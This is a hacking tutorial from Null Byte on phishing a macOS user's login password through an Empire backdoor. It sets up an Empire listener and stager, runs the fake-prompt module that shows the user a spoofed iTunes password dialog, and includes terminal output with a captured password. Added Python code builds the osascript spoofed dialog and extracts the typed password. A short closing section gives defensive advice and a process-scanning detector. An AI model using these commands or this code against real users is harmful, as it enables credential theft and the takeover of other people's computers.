
How Do I Perform Privilege Escalation, Part 2 (Password Phishing) «Null Byte :: WonderHowTo



Finding and abusing files with unsafe permissions is a simple and reliable way to escalate shell privileges on a backdoored macOS device. This time we'll be more aggressive and phish the user's login password outright, by presenting the target with a convincing pop-up that simply asks for it.

This privilege escalation method consists of the attacker raising a convincing pop-up window that instructs the target user to enter their password. Empire's prompt module lets us choose which application appears to be requesting the user's login password, so we can make iTunes, the App Store, or any other installed app ask for a password in a credible social engineering attack.

As the whoami command shows, the established Netcat backdoor is not running as root but as a normal user (tokyoneon).

bash-3.2$ whoami
tokyoneon

The first thing we want to do is turn our primitive Netcat backdoor into a full-featured Empire backdoor. This article assumes that readers have some experience with Empire; beginners should refer to Null Byte's Empire getting-started and stager guides before proceeding.

Step 1: Start an Empire Listener

Start Empire with a listener waiting for incoming connections from the target MacBook. In this example, I'm using an HTTP listener on port 8080. The following commands quickly set up an Empire listener:

(Empire)> listeners
[!] No listeners currently active
(Empire: listeners)> uselistener http
(Empire: listeners/http)> set Port 8080
(Empire: listeners/http)> set Host xx.xx.xx.xx
(Empire: listeners/http)> execute
[*] Starting listener 'http'
 * Serving Flask app "http" (lazy loading)
 * Environment: production
   WARNING: Do not use the development server in a production environment.
   Use a production WSGI server instead.
 * Debug mode: off
[+] Listener successfully started!
(Empire: listeners/http)> listeners

[*] Active listeners:

  Name      Module    Host                        Delay/Jitter
  ----      ------    ----                        ------------
  http      http      http://xx.xx.xx.xx:8080     5/0.0

(Empire: listeners)> _

The Host value can be a local-network IP address, or the address of a VPS for attacks over the internet.

Step 2: Create an OSX Stager

Next, create a launcher script with the osx/launcher stager. This can be done with the following commands:

usestager osx/launcher
set Listener http
generate

The entire launcher output, including the "echo" at the beginning and the "python" at the end of the one-liner, should be copied and pasted into the Netcat terminal.

A new agent will appear in the Empire terminal once the stager runs on the MacBook.

(Empire: agents)> [*] Sending PYTHON stager (stage 1) to xx.xx.xx.xx
[*] Agent P98MAEE0 from xx.xx.xx.xx posted valid Python PUB key
[*] New agent P98MAEE0 checked in
[+] Initial agent P98MAEE0 from xx.xx.xx.xx now active (Slack)
[*] Sending agent (stage 2) to P98MAEE0 at xx.xx.xx.xx
[>] ...................

(Empire: agents)> _

Step 3: Select Your Target and Module

Use the interact command to issue commands to the compromised macOS device.

(Empire: stager/osx/launcher)> interact P98MAEE0
(Empire: P98MAEE0)>

Load the collection/osx/prompt module with the usemodule command, then use the info command to display the module's options.

(Empire: P98MAEE0)> usemodule collection/osx/prompt
(Empire: python/collection/osx/prompt)> info

              Name: prompt
            Module: python/collection/osx/prompt
        NeedsAdmin: False
         OpsecSafe: False
          Language: python
MinLanguageVersion: 2.6
        Background: False
   OutputExtension: None

Authors:
  @FuzzyNop
  @harmj0y

Description:
  Launches a specified application with a prompt for
  credentials with osascript.

Comments:
  https://github.com/fuzzynop/FiveOnceInYourLife

Options:

  Name         Required    Value           Description
  ----         --------    -------         -----------
  ListApps     False       switch.         List applications available to
                                           launch.
  SandboxMode  False       switch.         Launch a sandbox-safe prompt.
  Agent        True        P98MAEE0        Agent to run module on.
  AppName      True        Google Chrome   The name of the application to launch.

(Empire: python/collection/osx/prompt)>

Step 4: Get a list of installed applications

The ListApps option returns a list of applications installed on the macOS device. Set it to true and execute the module.

(Empire: python/collection/osx/prompt)> set ListApps true
(Empire: python/collection/osx/prompt)> execute
[>] Module is not opsec safe, run? [y/N] y
[*] Tasked P98MAEE0 to run TASK_CMD_WAIT
[*] Agent P98MAEE0 tasked with task ID 1
[*] Tasked agent P98MAEE0 to run module python/collection/osx/prompt
(Empire: python/collection/osx/prompt)> [*] Agent P98MAEE0 returned results.

Available applications:

[1] DVD Player
[2] Siri
[3] QuickTime Player
[4] Chess
[5] Photo Booth
[6] Notes
[7] Image Capture
[8] iBooks
[9] Google Chrome
[10] Preview
[11] Dashboard
[12] TextEdit
[13] Mail
[14] Safari
[15] Dictionary
[16] Contacts
[17] Time Machine
[18] Utilities
[19] Font Book
[20] FaceTime
[21] Maps
[22] Mission Control
[23] Stickies
[24] Photos
[25] Messages
[26] Calculator
[27] iTunes
[28] Firefox
[29] Launchpad
[30] Reminders
[31] App Store
[32] Automator
[33] Calendar
[34] System Preferences

Before selecting an application, unset ListApps so that the module stops returning the list of applications and actually launches the prompt on the next run.

(Empire: python/collection/osx/prompt)> unset ListApps

Out of the box, there are plenty of applications suitable for this attack.

Step 5: Select an Application and Execute the Attack

To select an application, set the AppName value to the application's name. In my example, I'm using iTunes. Capitalization matters here: note the capital "T" in iTunes. The AppName value must match the name exactly as it appears in the list of apps above.

(Empire: python/collection/osx/prompt)> set AppName iTunes
(Empire: python/collection/osx/prompt)> execute
[>] Module is not opsec safe, run? [y/N] y
[*] Tasked P98MAEE0 to run TASK_CMD_WAIT
[*] Agent P98MAEE0 tasked with task ID 2
[*] Tasked agent P98MAEE0 to run module python/collection/osx/prompt

After a few seconds, the target user is shown a password prompt that appears to come from the application of your choice.

Once the target submits the password, the Empire terminal displays the following result:

(Empire: python/collection/osx/prompt)> [*] Agent P98MAEE0 returned results.
button returned:OK, text returned:super-secret-password-54321

If the target user is busy browsing iTunes media or is deep in their work, they may not hesitate to type their password just to make the annoying prompt go away.
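To make the mechanism concrete, here is an added example (my own code, not Empire's prompt module and not from the original article) of what a prompt module like this does on the target: it builds the osascript command that makes the chosen application raise a hidden-answer dialog, and it parses the record osascript prints when the user clicks OK. The dialog wording, the title, and the allowed-character check on the app name are assumptions modelled on the FiveOnceInYourLife approach the module credits, not Empire's exact strings.

```python
import re
import subprocess
from typing import Dict, List, Optional

# Assumption: dialog wording and title are illustrative, not Empire's exact strings.
DEFAULT_MESSAGE = "{app} requires your password to continue."
DEFAULT_TITLE = "{app} Alert"

# Only allow names that cannot break out of the AppleScript string literal;
# a quote or backslash in AppName would otherwise become AppleScript injection
# running under the agent's own privileges.
SAFE_APP_NAME = re.compile(r"[A-Za-z0-9][A-Za-z0-9 .\-]*")


def build_prompt_command(app_name: str, message: Optional[str] = None) -> List[str]:
    """Return the osascript argv that brings app_name to the front and shows a
    hidden-answer password dialog attributed to that app (what the module's
    AppName option selects)."""
    if not SAFE_APP_NAME.fullmatch(app_name):
        raise ValueError("unsafe application name: %r" % app_name)
    msg = message or DEFAULT_MESSAGE.format(app=app_name)
    if '"' in msg or "\\" in msg:
        raise ValueError("message must not contain quotes or backslashes")
    title = DEFAULT_TITLE.format(app=app_name)
    activate = 'tell application "%s" to activate' % app_name
    dialog = (
        'tell application "%s" to display dialog "%s" & return '
        'default answer "" with icon 1 with hidden answer with title "%s"'
        % (app_name, msg, title)
    )
    # Each -e script is its own argv element, so no shell quoting is involved.
    return ["osascript", "-e", activate, "-e", dialog]


# osascript prints the dialog result as an AppleScript record, for example:
#   button returned:OK, text returned:hunter2
RESULT_RE = re.compile(r"button returned:(?P<button>[^,]*), text returned:(?P<text>.*)$")


def parse_prompt_result(stdout: str) -> Optional[Dict[str, str]]:
    """Extract the button and the typed text from osascript's output.
    Returns None when the output is not a dialog record (e.g. an error)."""
    m = RESULT_RE.search(stdout.strip())
    if not m:
        return None
    return {"button": m.group("button").strip(), "text": m.group("text")}


def run_prompt(app_name: str) -> Optional[Dict[str, str]]:
    """Run the prompt on a macOS host. Returns None if the user hits Cancel:
    osascript then exits non-zero with 'User canceled. (-128)' on stderr."""
    proc = subprocess.run(build_prompt_command(app_name), capture_output=True, text=True)
    if proc.returncode != 0:
        return None
    return parse_prompt_result(proc.stdout)


if __name__ == "__main__":
    import sys
    print(run_prompt(sys.argv[1] if len(sys.argv) > 1 else "iTunes"))
```

Two details worth noticing: the returned text is the password in the clear, which is why the module is marked OpsecSafe: False and why an agent running as an ordinary user is enough; and because the app name ends up inside an AppleScript string, a module that took AppName unchecked would hand its own operator an injection primitive on the target.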

Defending Against Backdoor Attacks

Defending against this kind of attack is hard. Antivirus software can usually be bypassed with a few simple tricks, so it is not a reliable line of defense. If you receive password prompts you didn't trigger, or your MacBook's fans spin up unexpectedly, your macOS device may be compromised. One practical check: the spoofed dialog is an ordinary osascript process started by the backdoor, not a prompt generated by the application it names, so if a password request appears out of nowhere, cancel it and look at what is running (Activity Monitor or ps) before typing anything. In my next article, I'll cover a few strategies for identifying backdoors on your macOS devices, so stay tuned.
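As an added illustration of the kind of check that helps here (my own code, not from this article), the function below scans the output of `ps -axo pid,ppid,user,command` for osascript processes that display a hidden-answer dialog and rates each finding by its parent: a dialog whose parent is a scripting interpreter, shell, or network tool rather than a real application is almost certainly a spoof. The ps output embedded in the block is constructed for the example, not a real capture, and the list of suspicious parent programs is my own choice.

```python
import re
import subprocess
from typing import Dict, List

# Constructed sample of `ps -axo pid,ppid,user,command` output (not a real capture).
# PID 9021 is the spoofed prompt: an osascript launched by the backdoor's python
# interpreter. PID 9030 is an ordinary informational dialog without a hidden answer.
SAMPLE_PS = """\
  PID  PPID USER      COMMAND
    1     0 root      /sbin/launchd
 1201     1 tokyoneon /Applications/iTunes.app/Contents/MacOS/iTunes
 8801  8790 tokyoneon bash -i
 8877  8801 tokyoneon python -c import sys,base64;exec(base64.b64decode("aW1wb3J0IHN5cw=="))
 9021  8877 tokyoneon osascript -e tell application "iTunes" to activate -e tell application "iTunes" to display dialog "iTunes requires your password to continue." default answer "" with icon 1 with hidden answer with title "iTunes Alert"
 9030  1201 tokyoneon osascript -e tell application "iTunes" to display dialog "Library updated" buttons {"OK"}
 9040  1201 tokyoneon osascript -e display dialog "Enter passphrase" default answer "" with hidden answer
"""

# Both markers together mean "a dialog with a masked text field", i.e. a password box.
PROMPT_MARKERS = ("display dialog", "hidden answer")
# Parent programs that have no business raising a GUI password dialog (assumed list).
INTERPRETERS = re.compile(r"^(python[0-9.]*|perl|ruby|bash|sh|zsh|nc|ncat|curl|osascript)$")
APP_RE = re.compile(r'tell application "([^"]+)"')


def parse_ps(text: str) -> Dict[int, dict]:
    """Turn `ps -axo pid,ppid,user,command` output into {pid: process} records."""
    procs = {}
    for line in text.splitlines()[1:]:  # skip the header line
        parts = line.split(None, 3)
        if len(parts) < 4:
            continue
        pid, ppid, user, cmd = parts
        procs[int(pid)] = {"pid": int(pid), "ppid": int(ppid), "user": user, "cmd": cmd}
    return procs


def find_spoofed_prompts(ps_text: str) -> List[dict]:
    """Return every osascript process showing a hidden-answer dialog, with its
    parent and a severity: high when the parent is an interpreter/shell or is
    missing, medium otherwise."""
    procs = parse_ps(ps_text)
    findings = []
    for p in procs.values():
        cmd = p["cmd"]
        if not cmd.split()[0].endswith("osascript"):
            continue
        if not all(marker in cmd for marker in PROMPT_MARKERS):
            continue
        parent = procs.get(p["ppid"])
        parent_cmd = parent["cmd"] if parent else "<unknown>"
        parent_exe = parent_cmd.split()[0].rsplit("/", 1)[-1]
        app = APP_RE.search(cmd)
        severity = "high" if parent is None or INTERPRETERS.match(parent_exe) else "medium"
        findings.append({
            "pid": p["pid"],
            "user": p["user"],
            "app": app.group(1) if app else None,
            "parent_pid": p["ppid"],
            "parent": parent_cmd,
            "severity": severity,
        })
    return findings


def scan_live() -> List[dict]:
    """Run the check against the live process table (macOS/BSD ps syntax)."""
    out = subprocess.run(["ps", "-axo", "pid,ppid,user,command"],
                         capture_output=True, text=True, check=True).stdout
    return find_spoofed_prompts(out)


if __name__ == "__main__":
    for f in find_spoofed_prompts(SAMPLE_PS):
        print("%(severity)s: pid %(pid)s prompt for %(app)s, parent %(parent_pid)s (%(parent)s)" % f)
```

The parent-process check is the useful signal: the Empire agent is a Python process, so its prompt shows up as osascript whose parent is python, typically under a shell that is itself the child of whatever the backdoor was started from. The medium-severity case (a hidden-answer dialog raised by a real application) is rare in practice and still worth a look.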


Cover image by Christina Morillo/Pexels; screenshots by tokyoneon/Null Byte
